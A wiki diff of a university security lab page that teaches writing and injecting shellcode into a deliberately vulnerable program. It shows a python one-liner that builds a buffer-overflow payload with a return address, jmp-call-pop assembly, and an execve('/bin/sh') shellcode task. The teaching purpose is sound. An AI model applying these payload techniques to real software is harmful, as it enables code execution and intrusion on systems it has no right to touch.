Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-04 [2020/11/02 18:10] dennis.plosceanu [Phase 2: Finding the vulnerability] |
cns:labs:lab-04 [2022/10/31 17:22] (current) mihai.dumitru2201 [Tasks] |
||
|---|---|---|---|
| Line 33: | Line 33: | ||
| ===== Tutorial ===== | ===== Tutorial ===== | ||
| - | Let's write a simple shellcode which performs | + | For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does: |
| <code C> | <code C> | ||
| exit(1337); | exit(1337); | ||
| Line 298: | Line 299: | ||
| <code bash> | <code bash> | ||
| - | python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\xff')" > payload | + | python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload |
| gdb-peda$ r < payload | gdb-peda$ r < payload | ||
| Starting program: vuln < payload | Starting program: vuln < payload | ||
| Line 368: | Line 369: | ||
| <code asm> | <code asm> | ||
| + | BITS 64 | ||
| + | |||
| jmp string | jmp string | ||
| start: | start: | ||
| - | pop rcx ; pop address of `hello` variable in rcx | + | pop rsi ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits) |
| [...] | [...] | ||
| + | syscall ; do syscall on 64 bits | ||
| string: | string: | ||
| call start ; jump/trampoline back to start while storing the address of `hello` on the stack | call start ; jump/trampoline back to start while storing the address of `hello` on the stack | ||
| Line 377: | Line 381: | ||
| </code> | </code> | ||
| - | The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack. | + | The ''call'' instruction will push the address of the next "instruction" (in this case, our string), onto the stack. |
| </note> | </note> | ||
| Line 385: | Line 389: | ||
| <code C> | <code C> | ||
| - | execve('/bin/sh', ['/bin/sh'], 0); | + | execve("/bin/sh", ["/bin/sh", NULL], NULL); |
| </code> | </code> | ||
| - | Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'. | + | Where ''["/bin/sh", NULL]'' denotes the **address** of the array of two strings address: the address of the ''"/bin/sh"'' string and the ''NULL'' address. |
| <note tip> | <note tip> | ||
| - | You need to get the string '/bin/sh' on the stack. You can do this using the hack from the write challenge. | + | You need to get the address of the string ''"/bin/sh"'' on the stack. |
| + | You can do this using the hack from the write challenge. | ||
| </note> | </note> | ||
| <note tip> | <note tip> | ||
| - | You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly. | + | You can browse around shellstorm for examples; |
| + | however, keep in mind that they may not work due to some registers not being set properly. | ||
| </note> | </note> | ||
| ==== 3. execve with no zeros ==== | ==== 3. execve with no zeros ==== | ||
